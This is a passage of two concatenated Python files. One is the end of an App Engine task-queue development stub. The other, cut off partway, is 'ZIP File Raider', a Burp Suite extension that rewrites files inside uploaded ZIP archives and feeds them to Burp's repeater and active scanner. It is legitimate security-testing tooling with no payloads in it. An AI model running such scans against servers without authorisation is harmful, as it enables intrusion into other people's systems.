('X-AppEngine-TaskRetryCount': '0'),
('X-AppEngine-TaskETA': '1234567890.123456'),
('X-AppEngine-Development-Payload': '1'),
('Content-Length': 0),
('Content-Type': 'application/octet-stream')]
Raises:
ValueError: A task request contains an unknown HTTP method type.
KeyError: An invalid queue name was specified.
"""
return self._GetGroup().GetQueue(queue_name).GetTasksAsDicts()
def DeleteTask(self, queue_name, task_name):
"""Deletes a task from a queue, without leaving a tombstone.
Args:
queue_name: the name of the queue to delete the task from.
task_name: the name of the task to delete.
"""
if self._GetGroup().HasQueue(queue_name):
queue = self._GetGroup().GetQueue(queue_name)
queue.Delete(task_name)
queue.task_name_archive.discard(task_name)
def FlushQueue(self, queue_name):
"""Removes all tasks from a queue, without leaving tombstones.
Args:
queue_name: the name of the queue to remove tasks from.
"""
if self._GetGroup().HasQueue(queue_name):
self._GetGroup().GetQueue(queue_name).PurgeQueue()
self._GetGroup().GetQueue(queue_name).task_name_archive.clear()
def _Dynamic_UpdateQueue(self, request, unused_response):
"""Local implementation of the UpdateQueue RPC in TaskQueueService.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: A taskqueue_service_pb.TaskQueueUpdateQueueRequest.
unused_response: A taskqueue_service_pb.TaskQueueUpdateQueueResponse.
Not used.
"""
self._GetGroup(_GetAppId(request)).UpdateQueue_Rpc(request, unused_response)
def _Dynamic_FetchQueues(self, request, response):
"""Local implementation of the FetchQueues RPC in TaskQueueService.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: A taskqueue_service_pb.TaskQueueFetchQueuesRequest.
response: A taskqueue_service_pb.TaskQueueFetchQueuesResponse.
"""
self._GetGroup(_GetAppId(request)).FetchQueues_Rpc(request, response)
def _Dynamic_FetchQueueStats(self, request, response):
"""Local 'random' implementation of the TaskQueueService.FetchQueueStats.
This implementation loads some stats from the task store, the rest with
random numbers.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: A taskqueue_service_pb.TaskQueueFetchQueueStatsRequest.
response: A taskqueue_service_pb.TaskQueueFetchQueueStatsResponse.
"""
self._GetGroup(_GetAppId(request)).FetchQueueStats_Rpc(request, response)
def _Dynamic_QueryTasks(self, request, response):
"""Local implementation of the TaskQueueService.QueryTasks RPC.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: A taskqueue_service_pb.TaskQueueQueryTasksRequest.
response: A taskqueue_service_pb.TaskQueueQueryTasksResponse.
"""
self._GetGroup(_GetAppId(request)).QueryTasks_Rpc(request, response)
def _Dynamic_FetchTask(self, request, response):
"""Local implementation of the TaskQueueService.FetchTask RPC.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: A taskqueue_service_pb.TaskQueueFetchTaskRequest.
response: A taskqueue_service_pb.TaskQueueFetchTaskResponse.
"""
self._GetGroup(_GetAppId(request)).FetchTask_Rpc(request, response)
def _Dynamic_Delete(self, request, response):
"""Local delete implementation of TaskQueueService.Delete.
Deletes tasks from the task store. A 1/20 chance of a transient error.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: A taskqueue_service_pb.TaskQueueDeleteRequest.
response: A taskqueue_service_pb.TaskQueueDeleteResponse.
"""
self._GetGroup(_GetAppId(request)).Delete_Rpc(request, response)
def _Dynamic_ForceRun(self, request, response):
"""Local force run implementation of TaskQueueService.ForceRun.
Forces running of a task in a queue. This will fail randomly for testing if
the app id is non-empty.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: A taskqueue_service_pb.TaskQueueForceRunRequest.
response: A taskqueue_service_pb.TaskQueueForceRunResponse.
"""
if _GetAppId(request) is not None:
if random.random() <= 0.05:
response.set_result(
taskqueue_service_pb.TaskQueueServiceError.TRANSIENT_ERROR)
elif random.random() <= 0.052:
response.set_result(
taskqueue_service_pb.TaskQueueServiceError.INTERNAL_ERROR)
else:
response.set_result(
taskqueue_service_pb.TaskQueueServiceError.OK)
else:
group = self._GetGroup(None)
if not group.HasQueue(request.queue_name()):
response.set_result(
taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_QUEUE)
return
queue = group.GetQueue(request.queue_name())
task = queue.Lookup(1, name=request.task_name())
if not task:
response.set_result(
taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_TASK)
return
queue.RunTaskNow(task[0])
self._UpdateNextEventTime(0)
response.set_result(
taskqueue_service_pb.TaskQueueServiceError.OK)
def _Dynamic_DeleteQueue(self, request, response):
"""Local delete implementation of TaskQueueService.DeleteQueue.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: A taskqueue_service_pb.TaskQueueDeleteQueueRequest.
response: A taskqueue_service_pb.TaskQueueDeleteQueueResponse.
"""
app_id = _GetAppId(request)
if app_id is None:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.PERMISSION_DENIED)
self._GetGroup(app_id).DeleteQueue_Rpc(request, response)
def _Dynamic_PauseQueue(self, request, response):
"""Local pause implementation of TaskQueueService.PauseQueue.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: A taskqueue_service_pb.TaskQueuePauseQueueRequest.
response: A taskqueue_service_pb.TaskQueuePauseQueueResponse.
"""
app_id = _GetAppId(request)
if app_id is None:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.PERMISSION_DENIED)
self._GetGroup(app_id).PauseQueue_Rpc(request, response)
def _Dynamic_PurgeQueue(self, request, response):
"""Local purge implementation of TaskQueueService.PurgeQueue.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: A taskqueue_service_pb.TaskQueuePurgeQueueRequest.
response: A taskqueue_service_pb.TaskQueuePurgeQueueResponse.
"""
self._GetGroup(_GetAppId(request)).PurgeQueue_Rpc(request, response)
def _Dynamic_DeleteGroup(self, request, response):
"""Local delete implementation of TaskQueueService.DeleteGroup.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: A taskqueue_service_pb.TaskQueueDeleteGroupRequest.
response: A taskqueue_service_pb.TaskQueueDeleteGroupResponse.
"""
app_id = _GetAppId(request)
if app_id is None:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.PERMISSION_DENIED)
if app_id in self._queues:
del self._queues[app_id]
else:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_QUEUE)
def _Dynamic_UpdateStorageLimit(self, request, response):
"""Local implementation of TaskQueueService.UpdateStorageLimit.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: A taskqueue_service_pb.TaskQueueUpdateStorageLimitRequest.
response: A taskqueue_service_pb.TaskQueueUpdateStorageLimitResponse.
"""
if _GetAppId(request) is None:
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.PERMISSION_DENIED)
if request.limit() < 0 or request.limit() > 1000 * (1024 ** 4):
raise apiproxy_errors.ApplicationError(
taskqueue_service_pb.TaskQueueServiceError.INVALID_REQUEST)
response.set_new_limit(request.limit())
def _Dynamic_QueryAndOwnTasks(self, request, response):
"""Local implementation of TaskQueueService.QueryAndOwnTasks.
Must adhere to the '_Dynamic_' naming convention for stubbing to work.
See taskqueue_service.proto for a full description of the RPC.
Args:
request: A taskqueue_service_pb.TaskQueueQueryAndOwnTasksRequest.
response: A taskqueue_service_pb.TaskQueueQueryAndOwnTasksResponse.
Raises:
InvalidQueueModeError: If target queue is not a pull queue.
"""
self._GetGroup().QueryAndOwnTasks_Rpc(request, response)
def _Dynamic_ModifyTaskLease(self, request, response):
"""Local implementation of TaskQueueService.ModifyTaskLease.
Args:
request: A taskqueue_service_pb.TaskQueueModifyTaskLeaseRequest.
response: A taskqueue_service_pb.TaskQueueModifyTaskLeaseResponse.
Raises:
InvalidQueueModeError: If target queue is not a pull queue.
"""
self._GetGroup().ModifyTaskLease_Rpc(request, response)
def get_filtered_tasks(self, url=None, name=None, queue_names=None):
"""Get the tasks in the task queue with filters.
Args:
url: A URL that all returned tasks should point at.
name: The name of all returned tasks.
queue_names: A list of queue names to retrieve tasks from. If left blank
this will get default to all queues available.
Returns:
A list of taskqueue.Task objects.
"""
all_queue_names = [queue['name'] for queue in self.GetQueues()]
if isinstance(queue_names, basestring):
queue_names = [queue_names]
if queue_names is None:
queue_names = all_queue_names
task_dicts = []
for queue_name in queue_names:
if queue_name in all_queue_names:
for task in self.GetTasks(queue_name):
if url is not None and task['url'] != url:
continue
if name is not None and task['name'] != name:
continue
task_dicts.append(task)
tasks = []
for task in task_dicts:
payload = base64.b64decode(task['body'])
headers = dict(task['headers'])
headers['Content-Length'] = str(len(payload))
eta = datetime.datetime.strptime(task['eta'], '%Y/%m/%d %H:%M:%S')
eta = eta.replace(tzinfo=taskqueue._UTC)
task_object = taskqueue.Task(name=task['name'], method=task['method'],
url=task['url'], headers=headers,
payload=payload, eta=eta)
tasks.append(task_object)
return tasks
|
ZIPFileRaider.py
|
# encoding: utf-8
from burp import IBurpExtender
from burp import IHttpListener
from burp import ITab
from burp import IContextMenuFactory
from burp import IParameter
from StringIO import StringIO
from zipfile import ZipFile
from shutil import rmtree, make_archive, copytree, copy
from java.awt import GridLayout, Component, Color
from java.util import ArrayList
from javax.swing import JSplitPane, JTabbedPane, JButton, JPanel, JLabel, JTextArea, JList, BoxLayout, DefaultListModel, JScrollPane, JMenuItem, JTextField, JCheckBox
from jarray import array
from javax.swing.text import DefaultHighlighter
from time import sleep
import base64
import os
import threading
EXTENDER_FLAG = "zipFileRaiderFl4g"
ZIP_NAME = "myZip"
SCAN_ZIP_NAME = "myScanZip"
TEMP_PATH = "zipFileRaider" + os.sep + "tmp"
SCAN_TEMP_PATH = "zipFileRaider" + os.sep + "scan_tmp"
RUNNING_SCAN_PATH = "zipFileRaider" + os.sep + "running_scan_tmp"
INSETION_POINT_SYMBOL = u"§inserti0nP0int§"
PAYLOAD_PARAM_NAME = "extenderPayl0ad%d"
PAYLOAD_FILENAME = "extenderPayl0ad_filename"
class BurpExtender(IBurpExtender, IHttpListener, ITab, IContextMenuFactory):
#
# implement IBurpExtender
#
def registerExtenderCallbacks(self, callbacks):
self.isLock = False
self.magicParam = None
self.scanMagicParam = None
self.scanMessageInfo = None
self.repeaterMessageInfo = None
self.currentScanItem = None
self.scanInsertionPoint = {}
# obtain an extension helpers object
self._helpers = callbacks.getHelpers()
self._callbacks = callbacks
# set our extension name
callbacks.setExtensionName("ZIP File Raider")
# register ourselves as an HTTP listener
callbacks.registerHttpListener(self)
# register context menu
callbacks.registerContextMenuFactory(self)
self.initGUI()
callbacks.addSuiteTab(self)
print "[+]Init burp extender"
## implement IContextMenuFactory
def createMenuItems(self, invocation):
#get only selected message
self.messageInfo = invocation.getSelectedMessages()[0]
menuItemList = ArrayList()
menuItemList.add(JMenuItem("Send request to ZIP File Raider extender Repeater", actionPerformed = self.contextRepeaterClick))
menuItemList.add(JMenuItem("Send request to ZIP File Raider extender Scanner", actionPerformed = self.contextScannerClick))
return menuItemList
def contextRepeaterClick(self, event):
self.sendRequestToExtender("Repeater")
def contextScannerClick(self, event):
self.sendRequestToExtender("Scanner")
def sendRequestToExtender(self, tab):
#get filename
zipfilename = "Archive(default_name).zip"
filenameParam = self._helpers.getRequestParameter(self.messageInfo.getRequest(), "filename")
if filenameParam == None:
print "This request is not contain upload file"
return
if filenameParam.getType() == IParameter.PARAM_MULTIPART_ATTR:
zipfilename = filenameParam.getValue()
#get magicparam
requestString = self._helpers.bytesToString(self.messageInfo.getRequest())
magicParamStart, magicParamEnd = None, None
initialIndex = filenameParam.getValueStart() - 12
for i in range(initialIndex, 0 , -1):
if requestString[i] == '"' :
if magicParamEnd == None:
magicParamEnd = i
elif requestString[i-6:i] == " name=":
magicParamStart = i + 1
break
if magicParamStart == None:
print "[-]Cannot detect file parameter name"
return
else:
magicparam = requestString[magicParamStart:magicParamEnd]
dataParameter = self._helpers.getRequestParameter(self.messageInfo.getRequest(), magicparam)
#Check is zip upload or not
if not dataParameter is None:
value = dataParameter.getValue()
if tab == "Repeater":
self.repeaterMessageInfo = self.messageInfo
self.extractZipFile(value, TEMP_PATH)
self.showListFileDir(TEMP_PATH)
self.repeaterZipFilename = zipfilename
self.magicParam = magicparam
else:
self.removeDirectory(RUNNING_SCAN_PATH)
self.scanTemplateFileName = []
self.insertionPointCount = 0
self.scanMessageInfo = self.messageInfo
self.extractZipFile(value, SCAN_TEMP_PATH)
self.showScanListFileDir(SCAN_TEMP_PATH)
self.scanZipFilename = zipfilename
self.scanMagicParam = magicparam
else:
print "no data param"
## implement IHttpListener
def processHttpMessage(self, toolFlag, messageIsRequest, messageInfo):
# only process requests
if not messageIsRequest:
return
extenderFlag = self._helpers.getRequestParameter(messageInfo.getRequest(), EXTENDER_FLAG)
if not extenderFlag is None:
while self.isLock:
sleep(0.5)
# print "sleep"
pass
self.isLock = True
payloads = []
for i in range(0, self.insertionPointCount):
paramData = self._helpers.getRequestParameter(messageInfo.getRequest(), PAYLOAD_PARAM_NAME % i)
try:
payloads.append(paramData.getValue())
except Exception as e :
payloads.append("")
payloadsIndex = 0
for template in self.scanTemplateFileName:
newFileContent = ""
fileContentString = self._helpers.bytesToString(self.runningScanTemplate[template])
contentStrings = fileContentString.split(INSETION_POINT_SYMBOL)
for i, s in enumerate(contentStrings):
newFileContent += s
if i == len(contentStrings) - 1:
break
else:
newFileContent += payloads[payloadsIndex]
payloadsIndex += 1
newFileContent = self._helpers.stringToBytes(newFileContent)
try:
self.writeFile(RUNNING_SCAN_PATH + os.sep + template, newFileContent)
except Exception as e :
print "Error1 %s" % e
# ZipAndGo
try:
self.compressToZip(SCAN_ZIP_NAME, RUNNING_SCAN_PATH + os.sep + SCAN_TEMP_PATH)
zipContent = self.readFile(SCAN_ZIP_NAME + ".zip")
newRequest = self._helpers.updateParameter(messageInfo.getRequest(), self._helpers.buildParameter(self.scanMagicParam, zipContent, IParameter.PARAM_BODY))
# add filename
if self.isScanZipFilename:
filenamePayload = self._helpers.getRequestParameter(messageInfo.getRequest(), PAYLOAD_FILENAME).getValue()
newRequest = self.addMultipartFilenameParam(filenamePayload ,newRequest, self.scanMagicParam)
newRequest = self._helpers.removeParameter(newRequest, self._helpers.buildParameter(PAYLOAD_FILENAME, "none", IParameter.PARAM_BODY))
else:
newRequest = self.addMultipartFilenameParam(self.scanZipFilename ,newRequest, self.scanMagicParam)
#remove unnecessary param
for i in range(0, self.insertionPointCount):
newRequest = self._helpers.removeParameter(newRequest, self._helpers.buildParameter(PAYLOAD_PARAM_NAME%i, "none", IParameter.PARAM_BODY))
newRequest = self._helpers.removeParameter(newRequest, self._helpers.buildParameter(EXTENDER_FLAG, "none", IParameter.PARAM_BODY))
# set to newRequest
messageInfo.setRequest(newRequest)
except Exception as e :
print "Error2 %s" % e
# print "[+]request sent"
self.isLock = False
return
else:
# not from our extender
return
def extractZipFile(self, data, des_path):
b = base64.b64encode(data)
zipfile = ZipFile(StringIO(base64.b64decode(b)))
# remove tmp folder
self.removeDirectory(des_path)
zipfile.extractall(des_path)
print "[*]extract done"
def compressToZip(self, zipnName, zipDirPath):
make_archive(zipnName, "zip", zipDirPath)
return
def removeDirectory(self, rm_path):
if not os.path.exists(rm_path):
return
try:
rmtree(rm_path)
except Exception as e :
print "[-]Error while remove %s folder %s" % (rm_path, e)
def showListFileDir(self, mypath):
self.filename = []
self.fileDirList = []
self.absFilePath = {}
for root, dirs, files in os.walk(mypath):
path = root.split(os.sep)
fname = os.path.basename(root)
dirPath = (len(path) - 3) * "---" + fname
self.fileDirList.append(dirPath)
self.filename.append(fname)
for file in files:
filePath = (len(path)-2) * "---" + file
self.fileDirList.append(filePath)
self.filename.append(file)
self.absFilePath[filePath] = root + os.sep + file
self.fileDirList.remove(TEMP_PATH.split(os.sep)[1])
self.filename.remove(TEMP_PATH.split(os.sep)[1])
self.dirList.setListData(self.fileDirList)
def showScanListFileDir(self, mypath):
self.scanFilename = []
self.scanFileDirList = []
self.scanAbsFilePath = {}
for root, dirs, files in os.walk(mypath):
path = root.split(os.sep)
fname = os.path.basename(root)
dirPath = (len(path) - 3) * "---" + fname
self.scanFileDirList.append(dirPath)
self.scanFilename.append(fname)
for file in files:
filePath = (len(path)-2) * "---" + file
self.scanFileDirList.append(filePath)
self.scanFilename.append(file)
self.scanAbsFilePath[filePath] = root + os.sep + file
self.scanFileDirList.remove(SCAN_TEMP_PATH.split(os.sep)[1])
self.scanFilename.remove(SCAN_TEMP_PATH.split(os.sep)[1])
self.scanDirList.setListData(self.scanFileDirList)
def listSelect(self, event):
index = self.dirList.selectedIndex
key = self.fileDirList[index]
self.lblFilename.text = self.filename[index]
if key in self.absFilePath:
self.editField.setMessage(self.readFile(self.absFilePath[key]), False)
else:
#dir
self.editField.setMessage("/*Directory*/", False)
def scanListSelect(self, event):
index = self.scanDirList.selectedIndex
key = self.scanFileDirList[index]
self.scanLblFilename.text = self.scanFilename[index]
if key in self.scanAbsFilePath:
#file
if self.scanAbsFilePath[key] in self.scanTemplateFileName:
content = self.readFile(self.scanAbsFilePath[key])
for idx, el in enumerate(self.scanInsertionPoint[self.scanAbsFilePath[key]]):
# print el
content = self.setInsertionMark(content, el[0] + idx*2, el[1] + idx*2)
self.scanEditField.setMessage(content, False)
else:
self.scanEditField.setMessage(self.readFile(self.scanAbsFilePath[key]), False)
else:
#dir
self.scanEditField.setMessage("/*Directory*/", False)
def readFile(self, path):
file = open(path, "rb")
fileContent = file.read()
file.close()
return fileContent
def writeFile(self, path, content):
file = open(path, "wb")
file.write(content)
file.close()
def updateContentLength(self, request):
request = self._helpers.addParameter(request, self._helpers.buildParameter("dump", "none", IParameter.PARAM_BODY))
request = self._helpers.removeParameter(request, self._helpers.buildParameter("dump", "none", IParameter.PARAM_BODY))
return request
def addMultipartFilenameParam(self, zipfilename, request, magicparam):
dataParameter = self._helpers.getRequestParameter(request, magicparam)
getFilenameOffset = dataParameter.getNameEnd() + 1
filename = '; filename="%s"' % zipfilename
try:
requestString = self._helpers.bytesToString(request)
requestString = requestString[:getFilenameOffset] + filename + requestString[getFilenameOffset:]
request = self._helpers.stringToBytes(requestString)
request = self.updateContentLength(request)
return request
except Exception as e :
print(e)
return
def makeRequest(self, zipContent):
print "[+]thread is running (making request)"
request = self.repeaterMessageInfo.getRequest()
request = self._helpers.updateParameter(request, self._helpers.buildParameter(self.magicParam, zipContent, IParameter.PARAM_BODY))
# add filename
request = self.addMultipartFilenameParam(self.repeaterZipFilename ,request, self.magicParam)
# sending request
result = self._callbacks.makeHttpRequest(self.repeaterMessageInfo.getHttpService(), request)
self.requestPanel.setMessage(result.getRequest(), True)
try:
self.responsePanel.setMessage(result.getResponse(), False)
except Exception as e :
self.responsePanel.setMessage("An error occured", False)
print "[+]done"
def btnGoClick(self, event):
if self.repeaterMessageInfo == None:
return
self.saveEditFile()
self.compressToZip(ZIP_NAME, TEMP_PATH)
zipContent = self.readFile(ZIP_NAME + ".zip")
t1 = threading.Thread(target=self.makeRequest, args=[zipContent])
t1.start()
# print "[+]thread start"
def saveEditFile(self):
if self.repeaterMessageInfo == None:
return
index = self.dirList.selectedIndex
key = self.fileDirList[index]
if key in self.absFilePath:
#file
content = self.editField.getMessage()
self.writeFile(self.absFilePath[key], content)
def btnSaveClick(self, event):
self.saveEditFile()
def btnClearClick(self, event):
self.dirList.setListData([])
self.editField.setMessage("", False)
self.lblFilename.text = "File name"
self.requestPanel.setMessage("", True)
self.responsePanel.setMessage("", False)
self.repeaterMessageInfo = None
self.removeDirectory(TEMP_PATH)
def btnResetRepeaterClick(self, event):
print "btnClick"
if self.repeaterMessageInfo == None:
print "return"
return
dataParameter = self._helpers.getRequestParameter(self.repeaterMessageInfo.getRequest(), self.magicParam)
value = dataParameter.getValue()
# print value
self.extractZipFile(value, TEMP_PATH)
# self.sendRequestToExtender("Repeater")
self.listSelect(event)
def scanBtnClearClick(self, event):
self.scanTemplateFileName = []
self.scanInsertionPoint = {}
self.insertionPointCount = 0
self.scanDirList.setListData([])
self.scanEditField.setMessage("", False)
self.scanLblFilename.text = "File name"
self.scanMessageInfo = None
self.removeDirectory(SCAN_TEMP_PATH)
self.removeDirectory(RUNNING_SCAN_PATH)
def scanBtnClearInsClick(self, event):
self.scanTemplateFileName = []
self.scanInsertionPoint = {}
self.insertionPointCount = 0
self.removeDirectory(RUNNING_SCAN_PATH)
self.scanListSelect(event)
def addInsertionPoint(self, insStart, insEnd):
index = self.scanDirList.selectedIndex
key = self.scanFileDirList[index]
if key in self.scanAbsFilePath:
#file
if not self.scanAbsFilePath[key] in self.scanTemplateFileName:
self.scanTemplateFileName.append(self.scanAbsFilePath[key])
self.scanInsertionPoint[self.scanAbsFilePath[key]] = [[insStart, insEnd]]
else:
offset = len(self.scanInsertionPoint[self.scanAbsFilePath[key]]) * 2
self.scanInsertionPoint[self.scanAbsFilePath[key]].append([insStart - offset, insEnd - offset])
def btnSetInsertionPointClick(self, event):
if self.scanMessageInfo == None:
return
# show in UI
insertionPointChar = u"§"
selectedText = self.scanEditField.getSelectedData()
if selectedText == None:
print "[-]No selected area"
return
start = self.scanEditField.getSelectionBounds()[0]
end = start + len(selectedText)
requestString = self.scanEditField.getMessage()
newRequestString = self.setInsertionMark(requestString, start, end)
self.scanEditField.setMessage(newRequestString, False)
#save insertion point
self.addInsertionPoint(start, end)
self.insertionPointCount += 1
def setInsertionMark(self, requestString, start, end):
insertionPointChar = u"§"
selectedText = requestString[start:end]
newRequestString = self._helpers.bytesToString(requestString[:start]) + insertionPointChar + self._helpers.bytesToString(selectedText) + insertionPointChar + self._helpers.bytesToString(requestString[end:])
newRequestString = self._helpers.stringToBytes(newRequestString)
return newRequestString
def prepareScanRequest(self, request):
for i in range(0, self.insertionPointCount):
param = self._helpers.buildParameter(PAYLOAD_PARAM_NAME % i, self.runningScanDefaultPayload[i], IParameter.PARAM_BODY)
request = self._helpers.addParameter(request, param)
# add flag
param = self._helpers.buildParameter(EXTENDER_FLAG, "1", IParameter.PARAM_BODY)
request = self._helpers.addParameter(request, param)
# add filename scan
if self.checkboxScanFilename.isSelected():
self.isScanZipFilename = True
param = self._helpers.buildParameter(PAYLOAD_FILENAME, self.scanZipFilename, IParameter.PARAM_BODY)
request = self._helpers.addParameter(request, param)
else:
self.isScanZipFilename = False
return request
def prepareScanInsertionOffset(self, request, paramName):
param = self._helpers.getRequestParameter(request, paramName)
startOffset = param.getValueStart()
endOffset = param.getValueEnd()
return array([startOffset, endOffset], 'i')
def btnScanClick(self, event):
if self.scanMessageInfo == None:
return
self.runningScanTemplate = {}
self.runningScanDefaultPayload = []
self.removeDirectory(RUNNING_SCAN_PATH)
os.makedirs(RUNNING_SCAN_PATH)
copytree(SCAN_TEMP_PATH, RUNNING_SCAN_PATH + os.sep + SCAN_TEMP_PATH)
# self.insertionPointCount = 3
insertionPointNo = 0
# read template
for template in self.scanTemplateFileName:
t = self._helpers.bytesToString(self.readFile(template))
temp = ""
insertionPointNoOfFile = 0
# point to begin of file
insPoint = []
for el in self.scanInsertionPoint[template]:
insPoint.append(el[0])
insPoint.append(el[1])
insPoint.sort()
currentPoint = 0
for i in xrange(0, len(insPoint) - 1, 2):
# print p
temp += t[currentPoint:insPoint[i]] + INSETION_POINT_SYMBOL
currentPoint = insPoint[i + 1]
self.runningScanDefaultPayload.append(t[insPoint[i]:insPoint[i + 1]])
insertionPointNo += 1
temp += t[currentPoint:]
temp = self._helpers.stringToBytes(temp)
self.runningScanTemplate[template] = temp
if insertionPointNo != self.insertionPointCount:
print "[-]Error while parsing template"
return
#send to scanner
httpService = self.scanMessageInfo.getHttpService()
# request = self.scanMessageInfo.getRequest()
request = self.prepareScanRequest(self.scanMessageInfo.getRequest())
isHttps = True if httpService.getProtocol() == 'https' else False
insertionOffset = []
for i in range(0, self.insertionPointCount):
insertionOffset.append(self.prepareScanInsertionOffset(request,PAYLOAD_PARAM_NAME % i))
if self.isScanZipFilename:
insertionOffset.append(self.prepareScanInsertionOffset(request,PAYLOAD_FILENAME))
self.currentScanItem = self._callbacks.doActiveScan(httpService.getHost(), httpService.getPort(), isHttps, request, insertionOffset)
print "[*]Scanner is running"
self._callbacks.issueAlert("Send to Active Scanner")
t = threading.Thread(target=self.checkScannerStatus)
t.start()
def checkScannerStatus(self):
self.disableScanUi()
while True:
if self.currentScanItem == None:
self.scannerStatusLabel.text = "<html><i style='color:grey'> Canceled</i></html>"
self.enableScanUi()
return
else:
status = self.currentScanItem.getStatus()
if status == "finished":
self.scannerStatusLabel.text = "<html><i style='color:green'> Complete</i></html>"
self.enableScanUi()
self._callbacks.issueAlert("Scan Complete")
return
self.scannerStatusLabel.text = "<html><i style='color:orange'> %s</i></html>" % (status)
#schedule run every 1 sec
sleep(1)
def cancelScan(self, event):
self.currentScanItem.cancel()
self.currentScanItem = None
self.enableScanUi()
def disableScanUi(self):
self.scanBtnCancel.setEnabled(True)
self.scanBtnGo.setEnabled(False)
self.scanBtnSave.setEnabled(False)
self.scanBtnClearInsertionPoint.setEnabled(False)
self.scanBtnClear.setEnabled(False)
self.scanDirList.setEnabled(False)
def enableScanUi(self):
self.scanBtnCancel.setEnabled(False)
self.scanBtnGo.setEnabled(True)
self.scanBtnSave.setEnabled(True)
self.scanBtnClearInsertionPoint.setEnabled(True)
self.scanBtnClear.setEnabled(True)
self.scanEditField.setMessage("", False)
self.scanDirList.setEnabled(True)
#init extender GUI
def initGUI(self):
#
# Manual tab
#
tabPane = JTabbedPane(JTabbedPane.TOP)
reqRestabPane = JTabbedPane(JTabbedPane.TOP)
splitPane = JSplitPane(JSplitPane.HORIZONTAL_SPLIT)
tabPane.addTab("Repeater", splitPane)
splitPane2 = JSplitPane(JSplitPane.HORIZONTAL_SPLIT)
splitPane.setLeftComponent(splitPane2)
panel1 = JPanel()
panel2 = JPanel()
splitPane2.setLeftComponent(panel1)
splitPane2.setRightComponent(panel2)
splitPane.setRightComponent(reqRestabPane)
panel1.setLayout(BoxLayout(panel1,BoxLayout.Y_AXIS))
panel2.setLayout(BoxLayout(panel2,BoxLayout.Y_AXIS))
self.requestPanel = self._callbacks.createMessageEditor(None, False)
self.responsePanel = self._callbacks.createMessageEditor(None, False)
label1 = JLabel("files and folders")
self.lblFilename = JLabel("File name")
label3 = JLabel("Response")
self.editField = self._callbacks.createMessageEditor(None, True)
self.dirList = JList([], valueChanged = self.listSelect)
listFileDirPane = JScrollPane(self.dirList)
## Set left align
listFileDirPane.setAlignmentX(Component.LEFT_ALIGNMENT)
btnPanel = JPanel()
btnGo = JButton("Compress & Go", actionPerformed = self.btnGoClick)
btnSave = JButton("Save", actionPerformed = self.btnSaveClick)
btnClear = JButton("Clear", actionPerformed = self.btnClearClick)
btnReset = JButton("Reset", actionPerformed = self.btnResetRepeaterClick)
btnPanel.add(btnGo)
btnPanel.add(btnSave)
btnPanel.add(btnReset)
btnPanel.add(btnClear)
btnPanel.setLayout(BoxLayout(btnPanel,BoxLayout.X_AXIS))
panel1.add(label1)
panel1.add(listFileDirPane)
panel2.add(self.lblFilename)
panel2.add(self.editField.getComponent())
panel2.add(btnPanel)
reqRestabPane.addTab("Response",self.responsePanel.getComponent())
reqRestabPane.addTab("Request",self.requestPanel.getComponent())
splitPane.setResizeWeight(0.6)
#
# Scanner tab
#
scanSplitPane = JSplitPane(JSplitPane.HORIZONTAL_SPLIT)
tabPane.addTab("Scanner", scanSplitPane)
scanSplitPane2 = JSplitPane(JSplitPane.HORIZONTAL_SPLIT)
scanSplitPane.setLeftComponent(scanSplitPane2)
scanPanel1 = JPanel()
scanPanel2 = JPanel()
scanPanel3 = JPanel()
scanSplitPane2.setLeftComponent(scanPanel1)
scanSplitPane2.setRightComponent(scanPanel2)
scanSplitPane.setRightComponent(scanPanel3)
scanPanel1.setLayout(BoxLayout(scanPanel1,BoxLayout.Y_AXIS))
scanPanel2.setLayout(BoxLayout(scanPanel2,BoxLayout.Y_AXIS))
scanPanel3.setLayout(BoxLayout(scanPanel3,BoxLayout.Y_AXIS))
scanLabel1 = JLabel("files and folders")
self.scanLblFilename = JLabel("File name")
scanLabel3 = JLabel("<html><h3>Config scanner</h3></html>")
scanLabel4 = JLabel("<html><h3>Scanner status</h3></html>")
scanLabel5 = JLabel("""<html>
<div>
<h3>Notice</h3>
<ul>
<li>Possible to run only a scan at time</li>
<li>Work with .zip file only</li>
<li>Cannot continue after exit Burp</li>
</ul>
</div>
</html>""")
self.scannerStatusLabel = JLabel("<html><i style='color:grey'> Not Running</i></html>")
self.checkboxScanFilename = JCheckBox("Also scan zip filename (this may be upload several files to server)")
self.scanEditField = self._callbacks.createMessageEditor(None, False)
self.scanDirList = JList([], valueChanged = self.scanListSelect)
scanListFileDirPane = JScrollPane(self.scanDirList)
## Set left align
scanListFileDirPane.setAlignmentX(Component.LEFT_ALIGNMENT)
scanBtnPanel = JPanel()
self.scanBtnGo = JButton("Set insertion point", actionPerformed = self.btnSetInsertionPointClick)
self.scanBtnSave = JButton("Send to scanner", actionPerformed = self.btnScanClick)
self.scanBtnClearInsertionPoint = JButton("Clear insertion points", actionPerformed = self.scanBtnClearInsClick)
